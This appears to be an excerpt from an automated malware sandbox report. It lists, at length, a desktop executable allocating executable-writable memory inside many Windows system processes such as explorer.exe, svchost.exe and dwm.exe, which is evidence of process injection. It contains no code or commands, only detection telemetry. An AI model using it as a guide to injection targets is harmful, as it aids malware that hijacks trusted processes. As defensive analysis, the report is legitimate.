            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 30000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 140000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: C60000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 5A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: DD0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: AA0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 6D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 9E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: A00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: B00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 40000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\sihost.exe base: 3E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 40000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 9B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: AE0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\explorer.exe base: 2D40000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: C00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CD0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 8F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 980000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 40000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 150000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: C70000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 5B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: DE0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: AB0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 6E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 9F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: A10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: B10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 50000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\sihost.exe base: 3F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 50000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 9C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: AF0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\explorer.exe base: 2D50000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: C10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CE0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 900000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: A00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 990000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 50000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 160000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: C80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 5C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: DF0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: AC0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 6F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: A20000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: B20000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 60000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\sihost.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 60000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 9D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: B00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\explorer.exe base: 8880000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: C20000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CF0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 910000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F20000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: A10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 60000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 170000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: C90000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 5D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: E00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: AD0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 700000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: A30000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: B30000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 70000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\sihost.exe base: 410000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 70000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 9E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: B10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\explorer.exe base: 8850000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: C30000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 920000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F30000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: A20000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 70000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 180000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: CA0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 5E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: E10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: AE0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 710000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A20000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: A40000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: B40000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\sihost.exe base: 420000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 9F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: B20000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\explorer.exe base: 2F60000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: C40000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 930000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F40000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: A30000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9C0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 80000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 190000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: CB0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 300000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 5F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: E20000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: AF0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 720000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A30000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: A50000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: B50000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 90000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\sihost.exe base: 430000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 90000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: A00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: B30000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\explorer.exe base: 8830000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: C50000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D20000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 940000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F50000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: A40000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9D0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: F0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 90000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: CC0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 310000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 600000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: E30000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: B00000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 730000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A40000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: A60000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: B60000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dwm.exe base: A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\sihost.exe base: 440000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: A10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: B40000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\explorer.exe base: 8860000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: C60000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: D30000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 950000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F60000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: A50000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9E0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: 100000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: A0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: CD0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 320000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 610000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: E40000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\svchost.exe base: B10000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dllhost.exe base: 740000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A50000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: A70000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: B70000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\dwm.exe base: B0000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Memory allocated: C:\Windows\System32\sihost.exe base: 450000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\svchost.exe base: A20000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: B50000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory allocated: C:\Windows\explorer.exe base: 8870000 protect: page execute and read and writeJump to behavior
